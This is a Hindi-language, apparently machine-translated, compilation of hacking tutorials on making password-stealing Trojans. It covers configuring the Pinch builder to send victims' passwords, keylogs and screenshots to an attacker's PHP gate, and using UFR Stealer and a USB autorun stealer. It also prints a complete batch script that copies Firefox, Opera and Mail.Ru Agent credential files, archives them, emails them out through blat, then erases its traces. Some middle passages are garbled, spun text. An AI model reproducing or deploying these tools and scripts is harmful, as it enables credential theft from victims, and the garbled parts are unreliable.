लोग!!!
अब मैं आपको बताऊंगा कि अपना खुद का ट्रोजन वायरस कैसे बनाएं (लगभग अपना)!

जिसकी आपको जरूरत है:
दिमाग - 1 पीसी., कंप्यूटर - 1 पीसी., इंटरनेट एक्सेस - 1 पीसी., पिंच (बिल्डर) - 1 पीसी., सर्वर (ट्रोजन रिपोर्ट के लिए) - 1 पीसी., पार्सर (रिपोर्ट डिक्रिप्ट करने के लिए)।

शायद बस इतना ही...

अब, हमेशा की तरह, एक छोटी कहानी।

ट्रोजन
..इन्हें लगभग 33 शताब्दी पहले जाना जाता था

12वीं शताब्दी ईसा पूर्व में। ग्रीस ने ट्रॉय शहर पर युद्ध की घोषणा कर दी।
यह संघर्ष तब उत्पन्न हुआ जब एक ट्रोजन राजकुमार ने स्पार्टा की रानी हेलेन का अपहरण कर लिया और घोषणा की कि वह उसे अपनी पत्नी बनाना चाहता है। इससे स्वाभाविक रूप से यूनानियों, विशेषकर स्पार्टा के राजा को क्रोध आया। यूनानियों ने ट्रॉय को 10 वर्षों तक घेरे रखा, लेकिन कोई फायदा नहीं हुआ, क्योंकि... ट्रॉय अच्छी तरह से किलेबंद था।
अंतिम प्रयास में, यूनानी सेना ने पीछे हटने का नाटक किया और अपने पीछे एक विशाल लकड़ी का घोड़ा छोड़ दिया। ट्रोजन ने घोड़े को देखा और यह सोचकर कि यह यूनानियों का एक उपहार है, घोड़े को शहर में खींच लिया, उन्हें यह एहसास नहीं हुआ कि सबसे अच्छे यूनानी सैनिक खाली लकड़ी के घोड़े के अंदर बैठे थे।
अंधेरे की आड़ में सैनिक बाहर निकले, शहर के द्वार खोले और बाद में बची हुई सेना के साथ मिलकर पूरी ट्रोजन सेना को मार डाला। एक लकड़ी के घोड़े की तरह, कार्यक्रम
ट्रोजन हॉर्स एक काम करने का दिखावा करता है, लेकिन वास्तव में कुछ बिल्कुल अलग करता है।

एलेक्सी डेमचेंको - रूसी कुल खटस्कर को "उर्फ कोबन2के" के नाम से भी जाना जाता है।
कई कार्यक्रमों के लेखक, और उनका सबसे अच्छा (मेरी राय में) कार्यक्रम PINCH है, जो इंटरनेट पर सबसे आम ट्रोजन है! विशेष रूप से कई प्रोग्रामिंग भाषाओं को जानता है: C++, पास्कल, डेल्फ़ी, MySQL, PHP, XML और कई अन्य। सामान्य तौर पर, मैं आपको उनकी निजी वेबसाइट www.cobans.net पर जाने की सलाह देता हूं, वहां आपको उनके बारे में कुछ जानकारी मिलेगी।

विशेष रूप से, हम पिंच कार्यक्रम (पिंच 2.58) पर विचार कर रहे हैं
पिंच 2.58 एक बिल्डर, एक ट्रोजन वायरस कंपाइलर है... क्योंकि... बिल्डर में आप ट्रोजन के कुछ कार्यों पर हमला करेंगे... उदाहरण के लिए: ICQ, TheBat, FAT, ब्राउज़र कुकीज़ से पासवर्ड चुराएं (यह सबसे लोकप्रिय है)।
लेकिन इतना ही नहीं, पिंच यह भी कर सकता है: रजिस्ट्री में एक निश्चित पैरामीटर बनाएं/संपादित करें, काम पूरा होने के बाद खुद को हटा दें, "ब्लू स्क्रीन ऑफ डेथ" बनाएं, या इससे भी बेहतर, पीड़ित के कंप्यूटर पर एक सर्वर (कंसोल) बनाएं (बैकडोर) ), जिसके बाद पीड़ित का कंप्यूटर आपकी संपत्ति है (शाब्दिक रूप से)। आप उसके आईपी पते के माध्यम से उसके कंप्यूटर के माध्यम से डीडीओएस हमलों को अंजाम दे सकते हैं, और इस समय अपनी गुमनाम संप्रभुता बनाए रख सकते हैं।
बस यह मत सोचिए कि आपके पास केवल एक ही कंप्यूटर हो सकता है। आप उनमें से जितनी चाहें उतनी संख्या प्राप्त कर सकते हैं, लेकिन इसे पहले से ही बॉटनेट कहा जाता है...

खैर, बस इतना ही, चलिए शुरू करते हैं...

नीचे देखें कि पिंच बिल्डर कैसा दिखता है:

चित्र 1.1

55 सेकंड के बाद जोड़ा गया
अब मैं समझाऊंगा कि ट्रोजन कैसे काम करता है...

1. आप ट्रोजन को संकलित कर सकते हैं ताकि रिपोर्ट आपके द्वारा निर्दिष्ट ई-मेल पर भेजी जा सके। लेकिन वे आपको (अर्थात, आपके ट्रोजन को) जला सकते हैं क्योंकि... आपके पीड़ित के पास SP2 (Windows XP सर्विस पैक 2) हो सकता है) जिसका अर्थ है कि फ़ायरवॉल भी है... फ़ायरवॉल कभी भी (आपकी अनुमति के बिना) पोर्ट 25 (SMTP) चालू नहीं करेगा, जिसका अर्थ है कि आपका ट्रॉय पीड़ित की रिपोर्ट भेजने में सक्षम नहीं होगा ईमेल। (mail.ru, yandex.ru, आदि जैसे प्रसिद्ध मेलर्स रिपोर्ट प्राप्त नहीं करते हैं) मेलर http://goolook.ru का उपयोग करें लेकिन फिर भी, मैं SMTP का उपयोग करने की अनुशंसा नहीं करता हूं!

2. आप ट्रोजन को संकलित कर सकते हैं ताकि रिपोर्ट आपके द्वारा निर्दिष्ट सर्वर पर भेजी जा सके।
यह अधिक सुरक्षित है क्योंकि रिपोर्ट भेजने के समय, पिंच स्वयं को इस प्रकार प्रकट करता है:
प्रक्रिया का नाम: iexplorer.exe
प्रोटोकॉल: http
दूरस्थ पता: www.YOUR_SERVER.xxx/get.php
फ़ायरवॉल "iexplorer.exe" प्रक्रिया को नहीं रोक सकता (और यदि ऐसा हो सकता है, तो आप अपने कंप्यूटर मॉनिटर पर कुछ भी नहीं देख पाएंगे (डेस्कटॉप चित्र को छोड़कर))
प्रोटोकॉल: http:// का अर्थ है पोर्ट "80" (कोई टिप्पणी नहीं)

तो, आज हम "दूसरा" देखेंगे, मैंने पहले ही कहा था हाँ (?) कि यह बेहतर है।

आइए बिल्डर >>> पर और अधिक दौड़ें देखें

चित्र 1.1

1. "HTTP" टैब पर क्लिक करें और "HTTP" प्रोटोकॉल चुनें।

2. यूआरएल फ़ील्ड में, अपनी वेबसाइट (सर्वर) का पता दर्ज करें, उदाहरण के लिए: http://kuzia_lox.jino-net.ru/mailp_p/mail.php
हम इस पर अधिक विस्तार से ध्यान देंगे...
पिंच द्वारा आपको http:// के माध्यम से रिपोर्ट भेजने के लिए, आपको एक सर्वर की आवश्यकता है (आइए इसे बस "साइट" कहें) और इसलिए आपको एक ऐसी साइट की आवश्यकता है जिसकी PHP स्क्रिप्ट अनिवार्य रूप से काम करें!!! उनमें से सबसे अच्छा http://jino-net.ru है
सच है, मैंने कहा था कि http://onepage.ru/ भी है लेकिन सर्वर नष्ट हो गया था।
आगे है...
तो, किसी भी डोमेन और किसी भी पासवर्ड के तहत http://jino-net.ru पर रजिस्टर करें।
क्या आपने पंजीकरण कराया है?
हाँ मुझे लगता है…
आगे है...
मान लीजिए कि आपने http://petia_lox.jino-net.ru डोमेन के अंतर्गत पंजीकरण कराया है
हम आपकी साइट के एफ़टीपी पर जाते हैं। क्या आप जानते हैं एफ़टीपी क्या है? एह्ह्ह... मुझे आपको बताना होगा, क्योंकि मैं खुद को याद करता हूं...
एफ़टीपी आपकी साइट की सामग्री है... यानी, एफ़टीपी प्रोटोकॉल (पोर्ट 21) का उपयोग करके, आप अपनी साइट के मूल तक पहुँचते हैं जहाँ विभिन्न निर्देशिकाएँ/फ़ोल्डर/फ़ाइलें आदि समाहित हैं।

आइए Google.ru पर जाएं और "CuteFTP" प्रोग्राम डाउनलोड करें... शायद मैं यह आपके लिए करूंगा।
चलो यहाँ चलें >>>
http://www.google.ru/search?hl=ru&q=CuteFTP+download&btnG=Search+in+Google&lr=
मुझे चौथा लिंक अधिक पसंद है.
क्यूटएफ़टीपी 7.1 + रसिफायर डाउनलोड करें
चलिए >>>
http://gizmodo.ru/2005/07/23/skachat_cuteftp_7_1__rusifikator/
मुझे लगता है कि आगे आप समझ जाएंगे कि प्रोग्राम को कैसे डाउनलोड करना है और इसे कैसे इंस्टॉल करना है।

1 मिनट बाद जोड़ा गया
डाउनलोड किया गया, इंस्टॉल किया गया, Russified... आइए जारी रखें...

अब अपनी साइट के FTP पर जाएं। /docs/ फ़ोल्डर पर जाएं, इस फ़ोल्डर में कोई भी फ़ोल्डर बनाएं, उदाहरण के लिए "mail_p", इस फ़ोल्डर को CHMOD 777 अधिकार दें (संदर्भ मेनू में फ़ोल्डर पर राइट-क्लिक करें, "CHMOD" या "गुण" पैरामीटर ढूंढें क्यूटएफ़टीपी कार्यक्रम के विभिन्न संस्करणों में, विभिन्न अनुवाद)
अब इस फोल्डर (mail_p) में गेट अपलोड करें। पाना क्या है?
पिंच से रिपोर्ट प्राप्त करने के लिए इस गेट स्क्रिप्ट का एक्सटेंशन ".php" है।
आप इसे यहां प्राप्त कर सकते हैं >>>
http://pinch3.ru/other/gate.txt
अपने कंप्यूटर पर एक नोटपैड टेक्स्ट फ़ाइल बनाएं और गेट टेक्स्ट की प्रतिलिपि बनाएँ
http://pinch3.ru/other/gate.txt<<< в свой текстовый фаил >>> टेक्स्ट फ़ाइल को एक्सटेंशन दें.php (यह .txt हुआ करता था)

स्क्रिप्ट तैयार है, इसका नाम बदलकर "मेल" रखें और इसे अपनी वेबसाइट के FTP फ़ोल्डर /docs/mail_p/ में अपलोड करें।
और इस फ़ाइल को CHMOD अधिकार 777 दें।

इस स्थान को याद रखें, अब रिपोर्ट इस फ़ोल्डर में भेजी जाएंगी जहां प्राप्त स्थित है (/docs/mail_p/)।

तो हम यूआरएल फ़ील्ड में लिखते हैं (बिल्डर में यदि आप अभी तक नहीं भूले हैं)
http://petia_lox.jino-net.ru/mail_p/mail.php (आपका अपना पता है)

3. आइए देखें >>>

चित्र 1.2

सभी चेकबॉक्स बनाएं जैसे मैंने चित्र 1.2 में दिखाया है
"ओपेरा" पैरामीटर के ऊपर वाले बॉक्स को चेक न करें, अन्यथा रिपोर्ट डिक्रिप्ट नहीं की जाएगी (नीचे पढ़ें)।

आप पहले से ही संकलित कर सकते हैं... लेकिन हम अन्य अतिरिक्त (हालांकि कभी-कभी उनकी आवश्यकता भी होती है) कार्यों पर भी गौर करेंगे...

"पीडब्ल्यूडी" टैब, हम पहले से ही जानते हैं कि यह क्या है)
"रन" टैब उम्म्म्म के लिए है, मान लीजिए, पिंच की बुद्धिमत्ता को बेहतर बनाने के लिए, यानी खुद को हटाने के लिए, विंडोज़ में आपके .dlls को सहेजने के लिए और भी बहुत कुछ के लिए।
जासूस टैब. IE KeyLog आदि को सेव करने के लिए पीड़ित के मॉनिटर का स्क्रीनशॉट भेजें।
PHP कंसोल कमांड के लिए "NET" टैब सूचित करें/ मैं बाकी नहीं जानता...
मेरे प्रिय बेगडोर ने कभी भी पिंच'आ के "बीडी" टैब का उपयोग नहीं किया है...
ट्रोजन आइकन को बदलने के लिए, ट्रोजन को संपीड़ित करने के लिए "आदि" टैब।
किसी भी प्रक्रिया को ख़त्म करने के लिए "किल" टैब (उदाहरण के लिए फ़ायरवॉल)
"IE" टैब: IE प्रबंधित करें, पसंदीदा में एक साइट जोड़ें, एक लिंक का अनुसरण करें।
मैं "वर्म" टैब नहीं जानता... DNSsecs से संबंधित कुछ।
"आईआरसी-बॉट" टैब मूल रूप से बॉट्रैक के लिए है। बॉटनेट नियम)!!!

PWD टैब पर लौटें और बटन (नीचे) "संकलन" पर क्लिक करें

हुर्रे!!! ट्रोजन तैयार है!!!

हैकिंग ट्रोजन वायरस कैसे बनाएं। पिंच (लैमर्स के लिए)

यह संघर्ष तब उत्पन्न हुआ जब एक ट्रोजन राजकुमार ने स्पार्टा की रानी हेलेन का अपहरण कर लिया और घोषणा की कि वह उसे अपनी पत्नी बनाना चाहता है। इससे स्वाभाविक रूप से यूनानियों, विशेषकर स्पार्टा के राजा को क्रोध आया। यूनानियों ने ट्रॉय को 10 वर्षों तक घेरे रखा, लेकिन कोई फायदा नहीं हुआ, क्योंकि... ट्रॉय अच्छी तरह से किलेबंद था।

अंतिम प्रयास में, यूनानी सेना ने पीछे हटने का नाटक किया और अपने पीछे एक विशाल लकड़ी का घोड़ा छोड़ दिया। ट्रोजन ने घोड़े को देखा और यह सोचकर कि यह यूनानियों का एक उपहार है, घोड़े को शहर में खींच लिया, उन्हें यह एहसास नहीं हुआ कि सबसे अच्छे यूनानी सैनिक खाली लकड़ी के घोड़े के अंदर बैठे थे।

अंधेरे की आड़ में सैनिक बाहर निकले, शहर के द्वार खोले और बाद में बची हुई सेना के साथ मिलकर पूरी ट्रोजन सेना को मार डाला।

एक युवा व्यवस्थापक के नोट्स

कुछ दिन पहले, मेरे एक मित्र ने मेरी संपर्क दीवार पर एक संदेश के साथ भित्तिचित्र छोड़ दिया कि उसने मेरा खाता हैक कर लिया है, आदि। साइट vk-****.msk.ru का एक लिंक था। पूर्ण रूप से हाँ। बेशक।) मैंने तुरंत उसका इलाज कराने और उसका पासवर्ड बदलने के लिए उसे लिखा। लेकिन लिंक में अभी भी मेरी दिलचस्पी थी, हालाँकि मुझे पक्का पता था कि यह एक ट्रोजन था (इसी में मेरी दिलचस्पी थी)। मैंने इस लिंक का अनुसरण करने का निर्णय लिया. परिणामस्वरूप, मुझे एक प्रोग्राम डाउनलोड करने की पेशकश की गई जो कथित तौर पर हाल ही में खोजी गई संपर्क भेद्यता का लाभ उठाता है और आपको किसी भी खाते को हैक करने की अनुमति देता है।

पासवर्ड चुराने के लिए ट्रोजन बनाने के निर्देश

ऑनलाइन बैंकिंग से पैसे चुराने के लिए एक संक्षिप्त मार्गदर्शिका हैकिंग टेरिटरी: हैकज़ोना दिसंबर 28, 2010 वेबसाइट, ब्लॉग, फ़ोरम, ऑनलाइन स्टोर बनाने, उन्हें बढ़ावा देने के बारे में सब कुछ, क्या इसके लिए किसी प्रकार के ट्रोजन का उपयोग करना आवश्यक है, मुझे नहीं पता . मेरे घरेलू पासवर्ड अत्यधिक जटिल हैं, इसलिए मुझे आशा है कि उन्हें क्रैक किया जा सकता है। मूल रूप से यूक्रेन से (लिकपे का पंजीकरण, समीक्षा और अवसर) पासवर्ड चुराने के लिए ट्रोजन बनाना! — यूट्यूब नवंबर 1, 2012 यदि आपको समझ में नहीं आता है, तो स्काइप पर लिखें: comrad714 प्रोग्राम का नाम यूएफआर स्टीलर 3.0.1.0।

ट्रोजन कैसे बनाएं

तैयार हो जाइये, हमें एक साथ दो प्रोग्राम लिखने हैं। एक आपकी मशीन (क्लाइंट) पर होगा, दूसरे को पीड़ित (सर्वर) पर फेंकना होगा। काम बहुत होगा, शब्द कम होंगे और शरीर के करीब होंगे।

तो, डेल्फ़ी लॉन्च करें या यदि आपके पास यह पहले से ही चल रहा है, तो एक नया प्रोजेक्ट बनाएं ("फ़ाइल" - "नया एप्लिकेशन")। अब हम ट्रोजन के सर्वर भाग पर उतरेंगे।

यहां आपको "From1" को "ऑटो-क्रिएट फॉर्म" अनुभाग (बाईं ओर की सूची) से "उपलब्ध फॉर्म" (दाईं ओर की सूची) में ले जाना चाहिए, जैसा कि मैंने किया था।

ट्रोजन कैसे बनाएं

मुझे लगता है कि हर पाठक "ट्रोजन हॉर्स" कहावत की उत्पत्ति और अर्थ जानता है। ट्रोजन वायरस के संचालन का सिद्धांत लगभग समान है (यही कारण है कि इसे इसका नाम मिला)। इस वायरस के कई प्रकार हैं, आज मैं एलेक्सी डेमचेंको के विकास के आधार पर ट्रोजन प्रोग्राम बनाने के विकल्पों में से एक पर ध्यान केंद्रित करूंगा या, जैसा कि उन्हें "उर्फ कोबन 2k" भी कहा जाता है, जो एक बड़ी संख्या के लेखक हैं PINCH सहित कई प्रोग्राम, जो वर्ल्ड वाइड वेब पर सबसे आम ट्रोजन बन गया है!

ट्रोजन प्रोग्राम कैसे बनाएं.

हमने ट्रोजन बनाए और अब हम पासवर्ड चुराने के लिए ट्रोजन भी बना रहे हैं!

यहां मैं आपको बताऊंगा कि ICQ, Vkontakte, Odnoklassniki, Mail से पासवर्ड चुराने के लिए एक सरल ट्रोजन कैसे बनाया जाए। वगैरह। 3A%2F%2Fs61.ucoz.net%2Fsm%2F6%2Fsmile.gif&hash=1b9ff09e365c561776d64317149701b5″ /%

अब नोटपैड से "1.bat" फ़ाइल खोलें। और यांडेक्स मेल से अपने लॉगिन में "लॉगिन" शब्द बदलें। और "पासवर्ड" शब्द को अपने यांडेक्स मेल पासवर्ड में बदलें।

हम इंतजार करेंगे। डाउनलोड पूर्ण।

हम एक ट्रोजन बनाते हैं जो ब्राउज़र से सभी पासवर्ड चुरा लेता है (जैसा कि वादा किया गया था)

तो सबसे पहले हमें यूएफआर स्टीलर प्रोग्राम डाउनलोड करना होगा, यह आधिकारिक वेबसाइट vazonez.com पर या लिंक >> http://rghost.ru/55883641 के माध्यम से किया जा सकता है।

फिर हम "बिल्ड विकल्प" पर जाते हैं और चेंज आइकन पर क्लिक करते हैं ताकि हमारा ट्रोजन एक वास्तविक प्रोग्राम की तरह दिखे, या मर्ज फ़ाइलों पर क्लिक करें (पीड़ित के लिए उस प्रोग्राम को लॉन्च करना बेहतर है जिसके साथ ट्रोजन को एक साथ चिपकाया गया था, और प्रोग्राम के साथ ट्रोजन ही)

पासवर्ड चुराने के लिए ट्रोजन बनाना

वायरस की ऑपरेटिंग योजना इस प्रकार है: इसे लॉन्च किया जाता है, यह पीसी पर सभी फ़ोल्डरों को स्कैन करता है और आवश्यक फ़ाइलों (मास्क द्वारा, उदाहरण के लिए, *.txt. pass*, आदि) को एक फ्लैश ड्राइव पर कॉपी करता है।

एक विस्तारित कमांड प्रोसेसिंग मोड को सक्षम करता है, यानी, यह जटिल निर्माणों जैसे कि एक स्थिति में दो कमांड और अन्य की अनुमति देता है। हंसो मत, क्योंकि बैच के लिए यह बहुत अच्छा है।

इसके बाद, आपको उस निर्देशिका का पथ याद रखना होगा जहां से बैच फ़ाइल लॉन्च की गई थी (हमें डेटा को अपनी फ्लैश ड्राइव पर कॉपी करना होगा, न कि किसी हार्ड ड्राइव पर) क्योंकि आगे आने वाला कोड सीडी वेरिएबल के मान को भ्रमित करता है ( वर्तमान कार्यशील फ़ोल्डर)।

ट्रोजन के काम के अंत में, यह एक तैयार.txt फ़ाइल बनाएगा ताकि हम जान सकें कि इसने काम करना समाप्त कर दिया है (हम ट्रोजन को कंसोल के बिना अदृश्य बना देंगे)।

VKontakte पासवर्ड चुराने के लिए ट्रोजन, इंस्टॉलर डाउनलोड करें

एक कॉलम में, कॉन्टैक्ट में पासवर्ड चुराने के लिए एक ट्रोजन PS3 पर गेम को ब्लॉक कर देता है। ट्रोजन के पासवर्ड और चोरी के लिए मान्यता प्राप्त सामग्री को चुराने के लिए, मालिक के भौगोलिक निर्देशांक को ध्यान में रखा जाता है। उपयोगकर्ता के कार्यों को ध्यान में रखते हुए, पासवर्ड ट्रोजन आपको सिस्टम में संचार के लिए डिस्प्ले को निजीकृत करने की अनुमति देता है।

संचार के लिए, पासवर्ड ट्रोजन और स्वचालित बातचीत अत्याधुनिक निर्माण उपकरण प्रदान करते हैं।

पासवर्ड चोरी के लिए ट्रोजन

ऑफिस के काम की तरह, यह वर्चुअल डिस्क के रूप में आसान नेविगेशन प्रदान करता है। एक्टिव कंट्रोल ने बुकमार्क के साथ काम करने के लिए एक उत्पाद जारी करने की घोषणा की है। अधिग्रहण को रोकने के लिए रैखिक स्थान उनके सटीक स्थान को परिभाषित करता है।

पावर बैच ट्रैफ़िक को सीमित करने के लिए सहायता विषय की तलाश में है। बेकरी का बड़ा आकार आपको रिपोर्ट प्रदर्शित करने की अनुमति देता है। ठंडा करने के लिए कुंजियों को दबाकर रखने से, पासवर्ड चुराने वाले ट्रोजन में, व्यक्तिगत संपादन की तरह, संपूर्ण डेटा स्थानांतरण शामिल होता है।

ट्रोजन #9

एंटीवायरस चुराने वाला - इस प्रोग्राम को अनज़िप करें, 2 फ़ाइलों और एक फ़ोल्डर को फ्लैश ड्राइव (Antivirus.bat,autorun.inf,prog) में कॉपी करें और आप फ्लैश ड्राइव के साथ अपने दोस्तों के साथ जा सकते हैं! आप फ्लैश ड्राइव को कंप्यूटर में डालें, एंटीवायरस.बैट पर क्लिक करें, जब यह बंद हो जाए तो आप इसे बंद कर सकते हैं और फ्लैश ड्राइव को बाहर निकाल सकते हैं, आपके कंप्यूटर पर फ्लैश ड्राइव पर जितने भी पासवर्ड हैं, वे "प्रोग" में संग्रहीत हो जाएंगे। ” -> “लॉग” फ़ोल्डर।

इस लेख में मैं वर्णन करूंगा कि आप कितनी जल्दी और बिना किसी कठिनाई के एक वायरस लिख और बना सकते हैं जो पासवर्ड के साथ फ़ाइलें चुराता है और यह सब आपके मेलबॉक्स पर भेज देता है।
आइए इस तथ्य से शुरू करें कि वायरस बैट"ई (सीएमडी, आप मूल कमांड ले सकते हैं) में लिखा जाएगा, यानी, एक नियमित टेक्स्ट फ़ाइल में और मानक अंतर्निहित विंडोज दुभाषिया - "कमांड लाइन" का उपयोग करके निष्पादित किया जाएगा ".
ऐसा वायरस लिखने के लिए, आपको उन फ़ाइलों का सटीक भंडारण स्थान जानना होगा जिन्हें वह चुराएगा, ब्लैट घटक जिन्हें ऑफ-साइट http://www.blat.net/ या हमारे सर्वर से डाउनलोड किया जा सकता है, साथ ही WinRaR संग्रहकर्ता Rar.exe का एक घटक (आप इसके बिना भी कर सकते हैं)।
नोटपैड खोलें और निम्नलिखित कोड को वहां कॉपी करें:

@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass\ MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r कॉपी /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" कॉपी /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" कॉपी /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ कॉपी /y wand.dat %SystemDrive%\pass\opera\wand.dat कॉपी /y cookie4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\ Magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozilla\Firefox\Profiles\*.default\ कॉपी /y कुकीज़.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite कॉपी /y key3.db %SystemDrive%\pass\Mozilla\key3.db कॉपी /ysignons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite कॉपी /y %Windir%\Rar.exe %SystemDrive%\pass\Rar .exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ कॉपी /y %SystemDrive%\ pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot%\wincs\blat.exe -इंस्टॉल -सर्वर smtp.yandex.ru -पोर्ट 587 -f लॉगिन@यांडेक्स.ru -u लॉगिन -pw पासवर्ड रेन *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword [email protected] -अटैच %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\ पास rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat.exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe बाहर निकलें सीएलएस

मैं बूट के कोड के बारे में ज्यादा नहीं लिखूंगा।
@इको ऑफ - बैटिंका के शरीर को छुपाता है (इसलिए इसकी आवश्यकता नहीं है, लेकिन फिर भी)
md %systemroot%\wincs - विंडोज़ सिस्टम फ़ोल्डर में wincs फ़ोल्डर बनाता है, भले ही यह किस ड्राइव पर स्थापित हो या इसका नाम क्या हो।
md %SystemDrive%\pass\ - उस डिस्क पर पास फ़ोल्डर बनाता है जहां Windows सिस्टम स्थापित है।
md %SystemDrive%\pass\opera\ - ओपेरा फ़ोल्डर बनाता है जहां ओपेरा ब्राउज़र से wand.dat और cookie4.dat को भविष्य में कॉपी किया जाएगा (11* संस्करणों तक, ओपेरा अपने पासवर्ड wand.dat फ़ाइल में संग्रहीत करता है)
एमडी %SystemDrive%\pass\Mozilla\- एक मोज़िला फ़ोल्डर बनाता है जहां मोज़िला ब्राउज़र (कुकीज़.एसक्लाइट, की3.डीबी, साइनऑन्स.एसक्लाइट) से फ़ाइलें जिनमें पासवर्ड संग्रहीत हैं, भविष्य में कॉपी की जाएंगी।
एमडी %SystemDrive%\pass\MailAgent\- एक मेलएजेंट फ़ोल्डर बनाता है जिसमें मेल एजेंट से पत्राचार इतिहास और रजिस्ट्री कुंजियाँ (जो पासवर्ड संग्रहीत करती हैं) वाली फ़ाइलें कॉपी की जाएंगी।
एमडी %SystemDrive%\pass\MailAgent\reg- एक reg फ़ोल्डर बनाता है
विशेषता %systemroot%\wincs +h +s +r- Wincs फ़ोल्डर पर विशेषताएँ डालता है, जिससे यह दृश्य से छिप जाता है।
विशेषता %SystemDrive%\pass +h +s +r- उपरोक्त के समान।
प्रतिलिपि /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- अपलोड स्थान से blat.exe फ़ाइल को wincs फ़ोल्डर में कॉपी करता है
प्रतिलिपि /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- अपलोड स्थान से blat.dll फ़ाइल को wincs फ़ोल्डर में कॉपी करता है
प्रतिलिपि /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- अपलोड स्थान से blat.lib फ़ाइल को wincs फ़ोल्डर में कॉपी करता है
CD /D %APPDATA%\Opera\Opera\ - ओपेरा फ़ोल्डर में जाता है जहां ओपेरा के लिए पासवर्ड (और अन्य चीजें) वाली फ़ाइलें स्थित होती हैं।
प्रतिलिपि /y wand.dat %SystemDrive%\pass\opera\wand.dat- wand.dat फ़ाइल को ओपेरा फ़ोल्डर में कॉपी करता है
कॉपी /y कुकीज़4.dat %SystemDrive%\pass\opera\cookies4.dat- cookie4.dat फ़ाइल को ओपेरा फ़ोल्डर में कॉपी करता है
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- रजिस्ट्री कुंजी Magent_logins2, जहां पासवर्ड संग्रहीत है, को reg फ़ोल्डर में निर्यात करता है
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- रजिस्ट्री कुंजी Magent_logins3, जहां पासवर्ड संग्रहीत है, को reg फ़ोल्डर में निर्यात करता है
CD /D %APPDATA% - AppData फ़ोल्डर में जाएँ
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- Mra\Base फ़ोल्डर की सामग्री को MailAgent फ़ोल्डर में कॉपी करता है
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- ver.txt फ़ाइल को MailAgent फ़ोल्डर में कॉपी करता है
सीडी %AppData%\Mozilla\Firefox\Profiles\*.default\- मोज़िला ब्राउज़र प्रोफ़ाइल वाले फ़ोल्डर में जाएँ
प्रतिलिपि /y कुकीज़.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- कुकीज़.एसक्लाइट फ़ाइल को मोज़िला फ़ोल्डर में कॉपी करता है
कॉपी /y key3.db %SystemDrive%\pass\Mozilla\key3.db- key3.db फ़ाइल को मोज़िला फ़ोल्डर में कॉपी करता है
प्रतिलिपि /ysignons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite-signons.sqlite फ़ाइल को मोज़िला फ़ोल्डर में कॉपी करता है
प्रतिलिपि /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- WinRar Rar.exe संग्रहकर्ता घटक को पास फ़ोल्डर में कॉपी करता है
del /s /q %SystemRoot%\Rar.exe- विंडोज़ फ़ोल्डर से संग्रहकर्ता घटक को हटा देता है
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- पास फ़ोल्डर की सामग्री को संग्रहित करें
प्रतिलिपि /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rarबनाए गए संग्रह को Wincs फ़ोल्डर में कॉपी करें
cd %systemroot%\wincs - wincs फ़ोल्डर में जाएँ
%systemroot%\wincs\blat.exe -इंस्टॉल -सर्वर smtp.yandex.ru -पोर्ट 587 -fलॉगिन@यांडेक्स.ru -यू लॉगिन -पीडब्ल्यू पासवर्ड - प्राधिकरण के लिए डेटा निर्दिष्ट करके और पत्र भेजकर संग्रह भेजने के लिए ब्लैट प्रोग्राम तैयार करता है, जहां से संग्रह के साथ पत्र होगा, मेलबॉक्स से अपना डेटा इंगित करना न भूलें भेजा गया।
रेन *.rar pass.rar - यदि प्रक्रिया के दौरान संग्रह ने गलत नाम नहीं लिया है, तो हम इसे फिर से pass.rar नाम देंगे।
%systemroot%\wincs\blat.exe -बॉडी फ़ाइलें पासवर्ड -to [email protected] -%systemroot%\wincs\pass.rar संलग्न करें- बताएं कि पत्र किस डाक पते पर भेजा जाएगा और भेजें।
rmdir /s /q %SystemDrive%\pass- पास फ़ोल्डर हटाएं
rmdir /s /q %systemroot%\wincs- विंक्स फ़ोल्डर हटाएं
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- विंडोज़ फ़ोल्डर से ब्लैट घटकों को हटा दें।
del /s /q %systemroot%\blat.lib- विंडोज़ फ़ोल्डर से ब्लैट घटकों को हटा दें।
